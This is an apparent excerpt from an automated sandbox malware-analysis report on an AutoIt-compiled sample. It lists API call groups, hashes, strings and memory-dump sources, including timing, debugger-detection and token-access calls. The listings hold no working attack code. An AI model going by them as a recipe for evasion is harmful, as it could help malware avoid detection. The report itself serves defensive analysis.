                              • Opcode ID: b073c0f71179e35a2298e19162f1dc389edc38cbc25ea98c4732bc9e623ab5ec
                              • Instruction ID: 74f2553dfe9ba175e10729a9eeb7580b7670195449bfdfce3b5487e6c66db251
                              • Opcode Fuzzy Hash: b073c0f71179e35a2298e19162f1dc389edc38cbc25ea98c4732bc9e623ab5ec
                              • Instruction Fuzzy Hash: 54112535A1011DAFCF10EFA8D8899FE77B8FB05310F000466F901E7251DB30BA929BA6
                              APIs
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E166F
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E1694
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E169E
                              • Sleep.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E16D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                              • Instruction ID: fc9f193974571f9d959fdfce59cd39a4ea5a7385b3486c454717b959a0e8c529
                              • Opcode Fuzzy Hash: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                              • Instruction Fuzzy Hash: C7118E31C1851DDBCF00AFA6D848AEEBB78FF1A701F044059E941F6250CB3056A0DBD6
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction ID: 53767d400d4cd41554618c79c3a0b261653988b8827fd90d27f61716387f557b
                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction Fuzzy Hash: 8D01403604428EBBCF125E88CC018EE3F62FF99355F598515FA19A8231D237D9B1AB81
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 0090B59E
                              • ScreenToClient.USER32(?,?), ref: 0090B5B6
                              • ScreenToClient.USER32(?,?), ref: 0090B5DA
                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0090B5F5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              • Opcode ID: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                              • Instruction ID: f05e74b1d687279704ef3c71c22d22ef04735e2ee8c22e50959381d1344e4f07
                              • Opcode Fuzzy Hash: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                              • Instruction Fuzzy Hash: 381134B5D0420DEFDB51CF99C8449EEBBB9FB08310F104166E914E3620D735AA559F50
                              APIs
                              • _memset.LIBCMT ref: 0090B8FE
                              • _memset.LIBCMT ref: 0090B90D
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00947F20,00947F64), ref: 0090B93C
                              • CloseHandle.KERNEL32 ref: 0090B94E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$CloseCreateHandleProcess
                              • String ID:
                              • API String ID: 3277943733-0
                              • Opcode ID: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                              • Instruction ID: 7380a0aa45c8961f8ef8583518254b040ea5670628dcaa560f7bfd91c4be7e0d
                              • Opcode Fuzzy Hash: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                              • Instruction Fuzzy Hash: 49F089B55583087FF32027E5AC05F7BBA9CEB0A754F000460BF08D5192D7714D0497A9
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 008E6E88
                                • Part of subcall function 008E794E: _memset.LIBCMT ref: 008E7983
                              • _memmove.LIBCMT ref: 008E6EAB
                              • _memset.LIBCMT ref: 008E6EB8
                              • LeaveCriticalSection.KERNEL32(?), ref: 008E6EC8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalSection_memset$EnterLeave_memmove
                              • String ID:
                              • API String ID: 48991266-0
                              • Opcode ID: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                              • Instruction ID: 2ff563a280a9425f64dc05b703cd5e975ba19508b1b4c3c01211b0555b504252
                              • Opcode Fuzzy Hash: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                              • Instruction Fuzzy Hash: 63F0543A104200ABCF116F59DC85A49BB29FF46320F048061FE089E217C731E911DBB5
                              APIs
                                • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C030
                              • LineTo.GDI32(00000000,?,?), ref: 0090C03D
                              • EndPath.GDI32(00000000), ref: 0090C04D
                              • StrokePath.GDI32(00000000), ref: 0090C05B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                              • String ID:
                              • API String ID: 1539411459-0
                              • Opcode ID: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                              • Instruction ID: 671a20c3f10354cf89c168491093917311302aa815b035f4d8a4f7fba35a30fd
                              • Opcode Fuzzy Hash: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                              • Instruction Fuzzy Hash: 64F0B832018219BFDB226F54AC0AFCE3FA8AF0A310F048100FA11614E287B51661EBE6
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                              • GetCurrentThreadId.KERNEL32 ref: 008DA3B3
                              • AttachThreadInput.USER32(00000000), ref: 008DA3BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                              • Instruction ID: 00cf035f16c98847c94630c4ea7668f2187005d3baabfbc3e1209d2ed75938ba
                              • Opcode Fuzzy Hash: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                              • Instruction Fuzzy Hash: EAE0393114932CBADB245BA2DC0CED73F1CFF167A1F008125F508C4560CA72C640EBA0
                              APIs
                              • GetSysColor.USER32(00000008), ref: 00882231
                              • SetTextColor.GDI32(?,000000FF), ref: 0088223B
                              • SetBkMode.GDI32(?,00000001), ref: 00882250
                              • GetStockObject.GDI32(00000005), ref: 00882258
                              • GetWindowDC.USER32(?,00000000), ref: 008BC0D3
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BC0E0
                              • GetPixel.GDI32(00000000,?,00000000), ref: 008BC0F9
                              • GetPixel.GDI32(00000000,00000000,?), ref: 008BC112
                              • GetPixel.GDI32(00000000,?,?), ref: 008BC132
                              • ReleaseDC.USER32(?,00000000), ref: 008BC13D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                              • String ID:
                              • API String ID: 1946975507-0
                              • Opcode ID: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                              • Instruction ID: f92745601baef6bc5590dad35efcb25da48abddcf3b69455c00245afa14cb4e6
                              • Opcode Fuzzy Hash: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                              • Instruction Fuzzy Hash: A1E06D32118244EEDFB15F68FC0D7E87B14FB05336F008366FA69980E187714A90EB11
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 008D8C63
                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C6A
                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008D882E), ref: 008D8C77
                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CurrentOpenProcessThreadToken
                              • String ID:
                              • API String ID: 3974789173-0
                              • Opcode ID: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                              • Instruction ID: 00a91701c4ac58f54e635b0223bcb8564acb5719eb4e6d72e87f57029692daca
                              • Opcode Fuzzy Hash: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                              • Instruction Fuzzy Hash: 59E08636666211DFD7705FB06D0CB563BBCFF50BA2F044828B245D9040DA348545EB71
                              APIs
                              • GetDesktopWindow.USER32 ref: 008C2187
                              • GetDC.USER32(00000000), ref: 008C2191
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                              • ReleaseDC.USER32(?), ref: 008C21D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                              • Instruction ID: 4bb31af462a836cf4dc669b3aad38e97f7a77ba69e106c0a94633c358a1887db
                              • Opcode Fuzzy Hash: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                              • Instruction Fuzzy Hash: FFE0E575814618EFDF51AFA4C818AAD7BB1FB4C350F108429F95AD7660CB399241AF40
                              APIs
                              • GetDesktopWindow.USER32 ref: 008C219B
                              • GetDC.USER32(00000000), ref: 008C21A5
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                              • ReleaseDC.USER32(?), ref: 008C21D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                              • Instruction ID: 24862c23ef5b2a967b2dcd3cf80ed20b4155ddce2eff410a486da36ba510c2a8
                              • Opcode Fuzzy Hash: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                              • Instruction Fuzzy Hash: F3E012B5814608AFCF61AFB4C818AAD7BF1FF4C310F108029F95AE7620CB399241AF40
                              APIs
                              • OleSetContainedObject.OLE32(?,00000001), ref: 008DB981
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ContainedObject
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 3565006973-3941886329
                              • Opcode ID: e34137f79c41247b16231c3736479528a628a4eaf7166b6756ed9e137921e9be
                              • Instruction ID: 385def276fb0c5e1ddb3fa0db7ff1b400ed7baae93972256ebb6cec51eb75a60
                              • Opcode Fuzzy Hash: e34137f79c41247b16231c3736479528a628a4eaf7166b6756ed9e137921e9be
                              • Instruction Fuzzy Hash: B0914A74600205EFDB24DF68C884B6ABBE8FF49710F15856EE94ACB791EB70E840CB50
                              APIs
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • __wcsnicmp.LIBCMT ref: 008EB298
                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008EB361
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                              • String ID: LPT
                              • API String ID: 3222508074-1350329615
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00892AC8
                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00892AE1
                              Strings
                              Similarity
                              • API ID: GlobalMemorySleepStatus
                              • String ID: @
                              • API String ID: 2783356886-2766056989
                              APIs
                                • Part of subcall function 0088506B: __fread_nolock.LIBCMT ref: 00885089
                              • _wcscmp.LIBCMT ref: 008E9AAE
                              • _wcscmp.LIBCMT ref: 008E9AC1
                              Strings
                              Similarity
                              • API ID: _wcscmp$__fread_nolock
                              • String ID: FILE
                              • API String ID: 4029003684-3121273764
                              APIs
                              • _memset.LIBCMT ref: 008F2892
                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008F28C8
                              Strings
                              Similarity
                              • API ID: CrackInternet_memset
                              • String ID: |
                              • API String ID: 1413715105-2343686810
                              APIs
                              • DestroyWindow.USER32(?,?,?,?), ref: 00906D86
                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00906DC2
                              Strings
                              Similarity
                              • API ID: Window$DestroyMove
                              • String ID: static
                              • API String ID: 2139405536-2160076837
                              APIs
                              • _memset.LIBCMT ref: 008E2E00
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008E2E3B
                              Strings
                              Similarity
                              • API ID: InfoItemMenu_memset
                              • String ID: 0
                              • API String ID: 2223754486-4108050209
                              APIs
                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009069D0
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009069DB
                              Strings
                              Similarity
                              • API ID: MessageSend
                              • String ID: Combobox
                              • API String ID: 3850602802-2096851135
                              APIs
                                • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                              • GetWindowRect.USER32(00000000,?), ref: 00906EE0
                              • GetSysColor.USER32(00000012), ref: 00906EFA
                              Strings
                              Similarity
                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                              • String ID: static
                              • API String ID: 1983116058-2160076837
                              APIs
                              • GetWindowTextLengthW.USER32(00000000), ref: 00906C11
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00906C20
                              Strings
                              Similarity
                              • API ID: LengthMessageSendTextWindow
                              • String ID: edit
                              • API String ID: 2978978980-2167791130
                              APIs
                              • _memset.LIBCMT ref: 008E2F11
                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008E2F30
                              Strings
                              Similarity
                              • API ID: InfoItemMenu_memset
                              • String ID: 0
                              • API String ID: 2223754486-4108050209
                              APIs
                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008F2520
                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008F2549
                              Strings
                              Similarity
                              • API ID: Internet$OpenOption
                              • String ID: <local>
                              • API String ID: 942729171-4266983199
                              APIs
                                • Part of subcall function 008F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008F80C8,?,00000000,?,?), ref: 008F8322
                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008F80CB
                              • htons.WSOCK32(00000000,?,00000000), ref: 008F8108
                              Strings
                              Similarity
                              • API ID: ByteCharMultiWidehtonsinet_addr
                              • String ID: 255.255.255.255
                              • API String ID: 2496851823-2422070025
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008D9355
                              Strings
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 008D924D
                              Strings
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 008D92D0
                              Strings
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              APIs
                              Strings
                              Similarity
                              • API ID: ClassName_wcscmp
                              • String ID: #32770
                              • API String ID: 2292705959-463685578
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008D81CA
                                • Part of subcall function 008A3598: _doexit.LIBCMT ref: 008A35A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: 0aeead267bf87c5696b8d24389f8dcd41bfb6397c29aea0c2daf8c14015501f2
                              • Instruction ID: 3dc44904de06decd5431954904960159419bd29fa18a705dc0642bc77b9fb6a6
                              • Opcode Fuzzy Hash: 0aeead267bf87c5696b8d24389f8dcd41bfb6397c29aea0c2daf8c14015501f2
                              • Instruction Fuzzy Hash: 7DD05B333C572D36E61532AC6C0BFC67648DB05B55F004016FB08D59D38DD295D142DA
                              APIs
                                • Part of subcall function 008BB564: _memset.LIBCMT ref: 008BB571
                                • Part of subcall function 008A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008BB540,?,?,?,0088100A), ref: 008A0B89
                              • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008BB544
                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008BB553
                              Strings
                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008BB54E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                              • API String ID: 3158253471-631824599
                              • Opcode ID: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
                              • Instruction ID: 52c460caf7609b61b02a14f4c4cb6e798336a50e8f127e1fe0c0e940173e39ac
                              • Opcode Fuzzy Hash: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
